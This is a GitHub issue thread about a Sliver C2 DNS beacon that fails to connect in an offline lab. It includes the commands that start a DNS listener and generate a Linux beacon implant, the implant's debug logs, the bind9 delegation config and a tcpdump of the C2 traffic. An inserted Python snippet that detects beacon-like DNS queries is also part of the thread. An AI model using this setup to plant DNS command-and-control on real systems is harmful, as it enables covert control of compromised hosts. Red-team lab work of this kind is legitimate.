DNS beacon not working
Describe the bug
I've got mtls working no problem, but no luck with DNS.
To Reproduce
I'm using two Kali boxes, one red 192.168.43.50 and one purple 192.168.42.100, with an Ubuntu server running bind9 at 192.168.43.100.
This is all offline so any domain will do, but here's what I'm using:
[server] sliver > dns -d bad.airgapped.zip
[server] sliver > generate beacon --dns bad.airgapped.zip --seconds 10 --jitter 0 --os linux -d
Now when I go to connect, I'm able to resolve the weird subdomains, but there is no implant connection.
Weird subdomain taken from the debug implant execution:
nslookup baakb60un0qa.bad.airgapped.zip.
Server: 192.168.43.100
Address: 192.168.43.100#53
Non-authoritative answer:
Name: baakb60un0qa.bad.airgapped.zip
Address: 30.176.115.139
Here's some of the debug output:
./SLIPPERY_WITHDRAWAL
2023/09/12 00:05:07 sliver.go:99: Hello my name is SLIPPERY_WITHDRAWAL
2023/09/12 00:05:07 limits.go:58: Limit checks completed
2023/09/12 00:05:07 sliver.go:116: Running in Beacon mode with ID: 86a2a82a-ecad-466f-80c2-b2767b5310dc
2023/09/12 00:05:07 beacon.go:102: Starting beacon loop ...
2023/09/12 00:05:07 transports.go:41: Starting c2 url generator () ...
2023/09/12 00:05:07 transports.go:104: Return generator: (chan *url.URL)(0xc000038720)
2023/09/12 00:05:07 beacon.go:118: Recv from c2 generator ...
2023/09/12 00:05:07 transports.go:92: Yield c2 uri = 'dns://bad.airgapped.zip'
2023/09/12 00:05:07 transports.go:92: Yield c2 uri = 'dns://bad.airgapped.zip'
2023/09/12 00:05:07 beacon.go:122: Next CC = dns://bad.airgapped.zip
2023/09/12 00:05:07 beacon.go:122: Next CC = dns://bad.airgapped.zip
2023/09/12 00:05:07 transports.go:92: Yield c2 uri = 'dns://bad.airgapped.zip'
2023/09/12 00:05:07 sliver.go:125: Next beacon = &{0xa59680 0xa5d6a0 0xa59540 0xa595c0 0xa5d6e0 0xa594e0 dns://bad.airgapped.zip }
2023/09/12 00:05:07 dnsclient.go:152: DNS client connecting to 'bad.airgapped.zip' (timeout: 5s) ...
2023/09/12 00:05:07 dnsclient.go:299: [dns] found resolvers: [192.168.43.100]
2023/09/12 00:05:07 crypto.go:227: TOTP Code: 97209650
2023/09/12 00:05:07 dnsclient.go:717: [dns] Fetching dns session id via 'baakb60un0qa.bad.airgapped.zip.' ...
2023/09/12 00:05:07 resolver-generic.go:92: [dns] 192.168.43.100:53->A record of baakb60un0qa.bad.airgapped.zip. ?
2023/09/12 00:05:07 resolver-generic.go:175: [dns] rtt->192.168.43.100:53 1.586168ms (err:
Here's some of the bind9 config:
/etc/bind/named.conf.options
acl "localnet" {
192.168.43.0/24;
192.168.42.0/24;
};
options {
    directory "/var/cache/bind";
    recursion yes; # recursive queries
    allow-recursion { localnet; }; # recursive queries
    listen-on { 192.168.43.100; }; # IP address of the DNS server
    allow-transfer { none; }; # disable zone transfers
    forwarders {
        8.8.8.8;
        8.8.4.4;
    };
    dnssec-validation auto;
    listen-on-v6 { any; };
};
zone "airgapped.zip" IN {
    type master;
    file "/etc/bind/zones/db.airgapped.zip";
    forwarders {};
};
/etc/bind/zones/db.airgapped.zip
$TTL 604800
;ORIGIN airgapped.zip
@ IN SOA ns1.airgapped.zip. admin.airgapped.zip. (
1234567894 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
IN NS ns1.airgapped.zip.
ns1 IN A 192.168.43.100
; 192.168.43.0/24 - A records
elmo.airgapped.zip. IN A 192.168.43.50
bad.airgapped.zip. 360 IN NS elmo.airgapped.zip.
Expected behavior
A clear and concise description of what you expected to happe
Desktop (please complete the following information):
- OS: Kali
- Version: 1.5.40
Additional context
idk man, I'm the worst
I just updated to 1.5.41
Here's a tcpdump of port 53 on the Kali box:
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
07:45:16.335127 IP 192.168.43.100.55536 > 192.168.43.50.domain: 1964 A? baakb20vv4c8.bad.airgapped.zip. (48)
07:45:16.335682 IP 192.168.43.50.domain > 192.168.43.100.55536: 1964*- 1/0/0 A 221.91.184.120 (94)
07:45:16.336648 IP 192.168.43.100.34877 > 192.168.43.50.domain: 7234 A? 1c7vjr4d34255ayh276fyxp8.bad.airgapped.zip. (60)
07:45:16.336872 IP 192.168.43.50.domain > 192.168.43.100.34877: 7234*- 1/0/0 A 221.132.181.166 (118)
07:45:16.337530 IP 192.168.43.100.56987 > 192.168.43.50.domain: 2780 A? 1c7vjr4d342726tujhv0y9mc.bad.airgapped.zip. (60)
07:45:16.337701 IP 192.168.43.50.domain > 192.168.43.100.56987: 2780*- 1/0/0 A 71.184.116.15 (118)
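A defender-side counterpart to the capture above, added here and not part of the issue or of Sliver itself: it parses the tcpdump lines quoted in the comment (embedded below as a constructed sample), pairs each query with its answer by DNS transaction id, and flags zones whose leftmost labels are high-entropy and whose A-record answers never repeat, which is the pattern visible in that capture. The thresholds `min_queries` and `min_entropy` are assumptions chosen for illustration.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample: the three query/answer pairs quoted in the issue's tcpdump output.
SAMPLE = """\
07:45:16.335127 IP 192.168.43.100.55536 > 192.168.43.50.domain: 1964 A? baakb20vv4c8.bad.airgapped.zip. (48)
07:45:16.335682 IP 192.168.43.50.domain > 192.168.43.100.55536: 1964*- 1/0/0 A 221.91.184.120 (94)
07:45:16.336648 IP 192.168.43.100.34877 > 192.168.43.50.domain: 7234 A? 1c7vjr4d34255ayh276fyxp8.bad.airgapped.zip. (60)
07:45:16.336872 IP 192.168.43.50.domain > 192.168.43.100.34877: 7234*- 1/0/0 A 221.132.181.166 (118)
07:45:16.337530 IP 192.168.43.100.56987 > 192.168.43.50.domain: 2780 A? 1c7vjr4d342726tujhv0y9mc.bad.airgapped.zip. (60)
07:45:16.337701 IP 192.168.43.50.domain > 192.168.43.100.56987: 2780*- 1/0/0 A 71.184.116.15 (118)
"""

# tcpdump's one-line DNS summary: "<txid>[+] A? <name>. (<len>)" for queries,
# "<txid>*- 1/0/0 A <ip> (<len>)" for authoritative single-A answers.
QUERY = re.compile(r"^\S+ IP \S+ > \S+: (\d+)\+? A\? (\S+)\. \(\d+\)$")
ANSWER = re.compile(r"^\S+ IP \S+ > \S+: (\d+)\S* 1/0/0 A (\S+) \(\d+\)$")


def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a single DNS label."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def parse(capture: str):
    """Pair queries with answers by transaction id; yield (zone, leftmost label, answer ip)."""
    queries, answers = {}, {}
    for line in capture.splitlines():
        if m := QUERY.match(line):
            queries[m.group(1)] = m.group(2)
        elif m := ANSWER.match(line):
            answers[m.group(1)] = m.group(2)
    rows = []
    for txid, name in queries.items():
        label, _, zone = name.partition(".")
        rows.append((zone, label, answers.get(txid)))
    return rows


def suspicious_zones(capture: str, min_queries: int = 3, min_entropy: float = 3.0):
    """Flag zones with enough queries whose labels look encoded and whose answers never repeat."""
    per_zone = defaultdict(list)
    for zone, label, ip in parse(capture):
        per_zone[zone].append((label, ip))
    flagged = {}
    for zone, rows in per_zone.items():
        if len(rows) < min_queries:
            continue
        avg_entropy = sum(label_entropy(label) for label, _ in rows) / len(rows)
        ips = [ip for _, ip in rows if ip]
        all_distinct = bool(ips) and len(set(ips)) == len(ips)
        if avg_entropy >= min_entropy and all_distinct:
            flagged[zone] = {"queries": len(rows), "avg_entropy": round(avg_entropy, 2),
                             "distinct_answers": len(set(ips))}
    return flagged
```

On a real resolver log the same logic would run per client and per time window; the capture here is too short to set rate thresholds from.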
Duplicate of #1354 sorry for the delays in getting a fix out, I've been preoccupied with work for my day job heh.
Oh no dude!! I thought it was me!! Thanks for the sanity check. It's been driving me nuts! Thought for sure it was me.
Uninstalled (https://github.com/BishopFox/sliver/issues/1390#issuecomment-1701268939), deleted .sliver from home, installed per the issue you added (https://github.com/BishopFox/sliver/issues/1354#issuecomment-1711267923), got it working.
fantastic. Thank you again.
Fixed in v1.5.42